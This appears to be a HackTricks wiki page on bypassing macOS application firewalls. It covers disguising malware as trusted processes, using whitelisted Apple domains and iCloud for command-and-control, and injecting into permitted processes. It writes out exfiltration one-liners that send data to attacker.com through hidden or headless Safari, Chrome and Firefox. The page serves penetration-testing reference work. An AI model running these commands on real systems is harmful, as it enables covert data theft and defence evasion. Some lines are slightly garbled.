macOS Bypassing Firewalls
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
The following techniques were found working in some macOS firewall apps.
- For example calling the malware with names of well known macOS processes like
launchd
- If the firewall ask for permission to the user make the malware click on allow
- Like
curl, but also others likewhois
The firewall could be allowing connections to well known apple domains such as
apple.com or icloud.com. And iCloud could be used as a C2.Some ideas to try to bypass firewalls
Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them
lsof -i TCP -sTCP:ESTABLISHED
DNS resolutions are done via
mdnsreponder signed application which will probably vi allowed to contact DNS servers.
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
If you can inject code into a process that is allowed to connect to any server you could bypass the firewall protections:
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Last modified 3mo ago